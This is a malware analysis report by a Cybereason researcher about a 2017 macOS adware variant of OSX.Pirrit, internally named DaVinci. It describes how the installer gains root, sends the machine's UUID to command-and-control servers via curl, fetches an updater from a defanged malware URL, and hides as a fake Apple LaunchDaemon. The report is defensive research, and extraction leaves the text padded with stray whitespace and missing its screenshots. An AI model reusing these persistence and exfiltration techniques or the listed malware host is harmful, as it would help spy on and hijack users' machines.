### OSX PIRRIT: PART III ##### The DaVinci Code # PIRRIT ### OSX PIRRIT: PART III ##### The DaVinci Code # PIRRIT ----- In April 2016, I published a [research](http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf) report that analyzed a very nasty piece of adware that ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ targets Mac OS X. Called OSX.Pirrit, I discovered that it wasn’t your typical adware program ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ that just floods a person’s browser with ads. With components such as persistence and the ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ability to obtain root access, OSX.Pirrit has characteristics usually seen in malware. While ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ OSX.Pirrit’s main goal was to display ads, the way it did this contains many practices borrowed ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ from traditional malware. Ultimately, OSX.Pirrit’s code had the potential to carry out much more ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ malicious activities. As a result of the report, some of Pirrit’s servers and a few distribution ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ websites were taken down. ​ ​ ​ ​ ​ ​ But the story doesn’t end there. A few months later, I learned that a new variant of OSX.Pirrit ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ was in the wild. After investigating it, I discovered that a company called TargetingEdge created ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ OSX.Pirrit and, in July, wrote [a](https://www2.cybereason.com/research-osx-pirrit-mac-adware) report discussing how I figured this out. And once again, some ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Pirrit’s servers and distribution websites were taken offline. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Now it’s time for chapter three. Curious to see if OSX.Pirrit was still alive and spreading, I ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ recently started researching it again. And, to my surprise, it’s very active. Not only is it still ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ infecting people’s Macs, OSX.Pirrit’s authors learned from one of their mistakes (They obviously ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ read at least one of our earlier reports). ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Unlike old versions of OSX.Pirrit that used rogue browser plug-ins or even installed a proxy ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ server on the victim’s machine to hijack the browser, this incarnation uses (or shall I say ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ abuses) AppleScript, Apple's scripting/automation language. And, like its predecessors, this ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ variant is nasty. In addition to bombarding people with ads, it spys on them and runs under root ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ privileges. My research hasn’t gone unnoticed by TargetingEdge. For the past two weeks they've tried to ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ prevent me from publishing this research. Cybereason has received a few cease and desist ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ letters from a firm claiming to be TargetingEdge’s legal counsel. The letters demand that we ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ stop referring to TargetingEdge's software as malware and refrain from publishing this report. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Included below is the official response TargetingEdge requested that we include in our report: ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 1 ----- Cybereason isn’t the only security company that identifies OSX.Pirrit as a threat. Twenty-eight ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ other antivirus engines on Virus Total also classify it as such. The authors of this software went ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ through great lengths to mask themselves and distance themselves from it. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ As for why I'm still researching this program, constantly track threats, whether it’s sophisticated ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ nation state APTs or “benign adware" is how the security community learns about the latest ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ threats and how to stop them. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ As the letter shows, TargetingEdge is trying its best to deny any link to OSX.Pirrit. However, in ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ January 2017, a former employee, whose name was one of the two found in the dropped files ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ that led us to TargetingEdge, sent Cybereason his resumé where he clearly establishes a ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ connection between TargetingEdge and OSX.Pirrit. ​ ​ ​ ​ ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 2 ----- **Starting** **the** **research:** ​ ​ ​ ​ Every time I stumble across an interesting malware sample I write YARA rules for it. These rules ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ allow me to find new variants once they’re released. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Just before I wrote this report, one of my OSX.Pirrit-related YARA rules started returning ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ thousands of results, indicating a wave of new infections. After downloading and analyzing ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ some of the samples, I identified OSX.Pirrit straight away and noticed that many of its methods ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ changed. This report analyzes this latest variant. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ **An** **Important** **note** **before** **I** **discuss** **my** **research:** In this report, the term _installer_ refers to ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​​ ​ ​ ​ TargetingEdge’s main product - an installer that installs software like a video player or a PDF ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ reader that’s downloaded from a site. These installers will install the downloaded software and ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ and the additional malware. ​ ​ ​ ​ ​ ​ All of the installers that are downloading and executing these scripts are running as root since ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ the first thing that do after execution is to ask for the user’s password. This is a key point since it ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ explains how everything in the process described in this report is running with root permission. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 3 ----- Since users are, by default, in the sudoers list, getting the user’s password equals getting the ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ user’s root password. For more details, read [this](http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf) report or watch my talk from [LayerOne](https://youtu.be/CHiYT7vU9Fk) 2016. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ I started my research by looking at some telemetry data from the infected Macs and other threat ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ intel providers. After acquiring enough samples of Mac software installers (for more information ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ on the installers, read this report [on](http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf) OSX.Pirrit), I wrote some code that executes the installers ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ and looks at all of the outgoing connections that the installer creates. After doing that, I learned ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ that the installers are are generating HTTP requests to a specific URL, but that URL is actually a ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ one-time link that contains the ID of that specific install as an HTTP parameter, so every link ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ only works once. ​ ​ ​ ​ I then decided to mess with the URL to see if I can get one URL that will always work. To my ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ surprise, it was actually simpler than I thought. By using a quote (“) as the id parameter and ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ sending that request to the server, the server will return a URL with a link that always work: ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ And now when I request that URL, the server will return the installation script back to me: ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 4 ----- Another interesting thing to note is the “us” field in the request. Setting it to True delivers a ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ different installation script that points to a different server. My guess is the “us” parameter ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ stands for “United States” and it points to a different ad server. You can clearly see this in a ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ screenshot comparing the two files: ​ ​ ​ ​ ​ ​ ​ ​ A bash script with 329 lines is downloaded. This is very similar to the scripts I saw last year ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ when I analyzed OSX.Pirrit and it is very safe to say that both this script and last year’s script ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ were written by the same group or even person. This script has several functions, some with ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ names that are very descriptive, others with names that don’t say much. The script also contains ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ many domains and URLs, which help us understand how vast TargetingEdge’s infrastructure is. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ The​ 329​ ​ line​ ​ long​ ​ script​ ​ starts​ ​ by​ ​ defining​ ​ a​ ​ function​ ​ called​ ​ _rnd()​_ .​ ​ The​ ​ purpose​ ​ of​ ​ this​ ​ function ​ is to generate and return one random word by accessing the dictionary wordlist file (provided by ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ the​ operating​ ​ system​ ​ in​ ​ /usr/share/dict/words​ )​ ​ and​ ​ picking​ ​ one​ ​ random​ ​ word: ​ The​ names​ ​ that​ ​ are​ ​ generated​ ​ are​ ​ used​ ​ to​ ​ create​ ​ a​ ​ random​ ​ directory​ ​ in​ ​ ~/Library/,​ ​ which​ ​ will​ ​ contain​ ​ the​ ​ dropped​ ​ application.​ ​ In​ ​ this​ ​ case,​ ​ it’s​ ​ the​ ​ browser​ ​ hijacker. ​ The​ script​ ​ then​ ​ extracts​ ​ the​ ​ UUID​ ​ of​ ​ the​ ​ machine,​ ​ saves​ ​ it​ ​ to​ ​ a​ ​ variable​ ​ called​ ​ _$mid​_ ​ and​ ​ sends​ ​ it ​ back to one of TargetingEdge’s many command-and-control (C&C) servers by issuing a simple ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ _curl_ command: ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 5 ----- The script also sends other data back to the C&C server, such as the generated app name, its ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ path and its version. ​ ​ ​ ​ ​ ​ The script will then download a component of the malware called “updater” from yet another ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ server. The variable in the address points to ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ http://t[.]46sdzf3zdg1dxg2[.]us/download/hjfgkdvuewree?uu=1 The downloaded file is a tar.gz archive. Next, it’s extracted. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ The script will also create a launchagent in ~/Library/LaunchAgents/com..plist. That launchagent will run “updater” **as** **root** once the script finishes running. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ The next step is downloading the “updater” binary. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ **Analyzing** **_updater:_** ​ ​ ​ When​ analyzing​ ​ the​ ​ “​ _updater​_ ”​ ​ binary,​ ​ it​ ​ is​ ​ very​ ​ easy​ ​ to​ ​ understand​ ​ its​ ​ purpose​ ​ by​ ​ looking​ ​ at​ ​ it ​ with a disassembler (in this case I’m using Jonathan Levin’s _[jtool):](http://newosxbook.com/tools/jtool.html)_ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 6 ----- As the names of the functions show, they are all infrastructure related: keeping the infrastructure ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ updated, downloading files, installing new versions of the malware on the machine. But there is ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ one​ function​ ​ that​ ​ stands​ ​ out:​ ​ _[UpdaterCommunication​_ ​ _runExternalApplication]​_ ​. Disassembling it in IDA Pro clearly reveals this function’s purpose: ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ The​ ​ function​ ​ executes​ ​ _/bin/sh​_ ​ with​ ​ _[NSTASK​](https://developer.apple.com/documentation/foundation/nstask)_ ​​ with​ ​ a​ ​ parameter​ ​ in​ ​ the​ ​ format​ ​ of​ ​ a​ ​ string. ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 7 ----- The​ _updater​_ ​ file​ ​ is​ ​ the​ ​ only​ ​ file​ ​ that’s​ ​ codesigned.​ ​ However,​ ​ unlike​ ​ the​ ​ original​ ​ OSX.Pirrit,​ ​ it ​ was codesigned with an ad hoc signature instead of a normal certificate. Ad hoc signatures are ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ used to provision **iOS** applications in **test** **environments.** An ad hoc signed Mach-O executable ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ has no meaning on macOS since the component that checks and validates ad hoc signatures, ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ the AMFI trust cache, does not exist in macOS. My guess is that if this binary wasn’t ad hoc ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ signed by mistake, it was an attempt to fool antivirus programs. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ As​ a​ ​ part​ ​ of​ ​ _updater​_ _’s​_ ​ work,​ ​ it​ ​ enumerates​ ​ running​ ​ processes​ ​ using​ ​ the​ ​ _[NSWorkspace​](https://developer.apple.com/documentation/appkit/nsworkspace)_ ​ class, ​ calls​ the​ ​ _[runningApplications​](https://developer.apple.com/documentation/appkit/nsworkspace/1534059-runningapplications)_ ​ function​ ​ and​ ​ then​ ​ iterates​ ​ over​ ​ the​ ​ output​ ​ to​ ​ see​ ​ if​ ​ either ​ Firefox, Chrome or Safari are running. It then downloads “ad packages” for the browsers that ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ are installed on the system. _Updater_ always runs in the background (it’s also installed as a ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ LaunchAgent) and ensures that the ad packages are always up to date. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ **Installing** **_updater’s_** **LaunchAgent:** ​ ​ ​ ​ ​ The​ dropped​ ​ _updater​_ ​ binary​ ​ will​ ​ now​ ​ be​ ​ moved​ ​ to​ ​ ~/Library//.​ ​ After​ ​ _updater​_ ​ has​ ​ been​ ​ renamed​ ​ and​ ​ moved​ ​ to​ ​ a​ ​ proper​ ​ directory,​ ​ the​ ​ script​ ​ will​ ​ finally ​ create​ the​ ​ the​ ​ LaunchAgent​ ​ plist​ ​ file​ ​ in​ ​ ~/Library/LaunchAgents/com..plist As the following screenshot shows, the random word that was chosen when installed in my ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ analysis setup was “roadless”. This means that the file was created in ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ~/Library/roadless/roadless​ and​ ​ the​ ​ LaunchAgent​ ​ name​ ​ was​ ​ _com.roadless.plist ​_ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 8 ----- After the updater LaunchDaemon was created, the script will now download a file called ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ _sr_v2.tgz​_ to​ ​ /var/tmp/sr.tgz​ .​ ​ It​ ​ will​ ​ then​ ​ be​ ​ extracted​ ​ to​ ​ _/var/tmp/dvs​_ .​ ​ This​ ​ file​ ​ contains ​ the malware that will hijack the browser. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Once extracted to its temporary directory, we can see a bunch of files and directories extracted. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Among​ these​ ​ files​ ​ are​ ​ two​ ​ executables​ ​ (​ _Protector​_ ​ and​ ​ _updater​_ _)​_ ​ and​ ​ various​ ​ installation​ ​ and ​ setup​ scripts​ ​ (​ _setup.sh​_ ​ and​ ​ ​install_updater.sh): ​ The​ program​ ​ will​ ​ now​ ​ execute​ ​ yet​ ​ another​ ​ setup​ ​ script,​ ​ called​ ​ _setup.sh​_ .​ ​ This​ ​ script​ ​ installs​ ​ the ​ program’s next components. The authors left the program’s internal name in the setup script: ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ DaVinci. In the next step, the script again generates a list of names but doesn’t use the wordlist file on ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ the​ system.​ ​ Instead,​ ​ it​ ​ selects​ ​ a​ ​ word​ ​ from​ ​ the​ ​ _names.db​_ ​ file: ​ Immora Nalen Quoroden Enthinge Kimathen Cheechran Ightquemos Dandan Morkim Ertur ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Etiao Schiwarkin Vayt Crybur Ashsul Tiavorurn Dannalmos Saml Rek Sideb Therkkin Usktas ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Cereng Builing Nysgar Beldanash Roinnris Yenga Ightem Pertino Athechyer Sysir Nomaro ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Rilchin Yerrack Elmeld Riarat Tasard Miom Panur Milobe Rothl ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ After​ a​ ​ random​ ​ name​ ​ is​ ​ chosen​ ​ from​ ​ _names.db​_,​ ​ **another​** ​ LaunchAgent​ ​ for​ ​ DaVinci​ ​ is​ ​ created​ ​ in ​ _/Library/LaunchDaemons/com.apple..plist​_ ​ -​ ​ As​ ​ clearly​ ​ shown, ​ DaVinci is trying to mask itself as a legitimate Apple LaunchDaemon. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 9 ----- **DaVinci** **and** **browser** **add-ons:** ​ ​ ​ ​ ​ ​ In previous versions of OSX.Pirrit and BrowserEnhancer, in some cases, the malware dropped ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ malicious browser extensions to track the users and display ads. Since browser extensions are ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ fairly easy to identify and remove, the authors chose a different path (which I will talk about ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ later) and tracked the user’s browser. However, this installation script tries to remove old ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ versions of the user’s Safari browser extension and removes a Safari extension called ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ [“omnikey”.](http://marioestrada.github.io/safari-omnikey/) I don’t know what TargetingEdge has against Omnikey but if I had to guess, I’d say it ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ interfered with either their browser hooking (more on that later) or the data they received from ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ machines with Omnikey installed. ​ ​ ​ ​ ​ ​ Copyright​ ©​ ​ 2017​ ​ Cybereason​ ​ Inc.​ ​ All​ ​ rights​ ​ reserved. ​ 10 ----- The​ script​ ​ will​ ​ look​ ​ inside​ ​ the​ ​ _/Safari/Extensions​_ ​ **in​** ​ **every​** ​ **user’s​** ​ **home​** ​ **directory​** ​ to​ ​ see ​ if there are any old installations and/or “unwanted” extensions. Any that are found are deleted. ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ ​ 